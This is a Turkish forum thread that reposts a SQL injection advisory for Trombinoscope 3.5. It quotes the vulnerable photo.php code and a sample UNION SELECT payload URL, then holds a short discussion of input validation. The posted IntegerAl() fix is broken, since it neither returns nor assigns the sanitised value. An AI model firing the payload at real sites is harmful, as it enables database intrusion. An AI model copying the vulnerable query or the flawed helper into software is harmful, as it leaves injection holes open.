

Trombinoscope 3.5 SQL Injection
-
Exploit Title: Trombinoscope <= 3.5 SQL Injection Vulnerability
Software Link: http://ftp1.toocharger.com/sc2MP3p/trombinoscope_4116.zip
Açığa sebebep olan photo.php deki kodlar<?php $id = $_GET["id"]; $query_seul = "SELECT `pseudo`, `sexe`, `img` FROM `trombino` WHERE idx = $id"; $seul = mysql_query($query_seul) or die(mysql_error()); $row_seul = mysql_fetch_assoc($seul); ?>
Örnek Exploit: http://site.com/[script]/photo.php?id=-9999/**/union/**/select/**/1,2,version()--
-
Programcıların, özellikle Web programcılarının,
Get'le, requestle data almayı bırakması, Değişken çeşidine göre kontrol yapıp değer alan fonksiyonlar ile işlem yapması şart...
Yaz bi fonksiyon IntegerAl() diye bitsin gitsin arkadaş...
İlla bi yerde unutursun ondan sonra böyle...
-
renegadealien bunu yazdı:
-----------------------------Programcıların, özellikle Web programcılarının,
Get'le, requestle data almayı bırakması, Değişken çeşidine göre kontrol yapıp değer alan fonksiyonlar ile işlem yapması şart...
Yaz bi fonksiyon IntegerAl() diye bitsin gitsin arkadaş...
İlla bi yerde unutursun ondan sonra böyle...
-----------------------------hocam vaktin varsa bununla ilgili makale,döküman vs. yazabilir misin?
-
EmQceR bunu yazdı:
-----------------------------renegadealien bunu yazdı:
-----------------------------Programcıların, özellikle Web programcılarının,
Get'le, requestle data almayı bırakması, Değişken çeşidine göre kontrol yapıp değer alan fonksiyonlar ile işlem yapması şart...
Yaz bi fonksiyon IntegerAl() diye bitsin gitsin arkadaş...
İlla bi yerde unutursun ondan sonra böyle...
-----------------------------hocam vaktin varsa bununla ilgili makale,döküman vs. yazabilir misin?
-----------------------------<?php
function IntegerAl($degisken,$get)
{
$degisken=(int)mysql_real_escape_string($_GET[$get]);
}
IntegerAl('no','id');
?>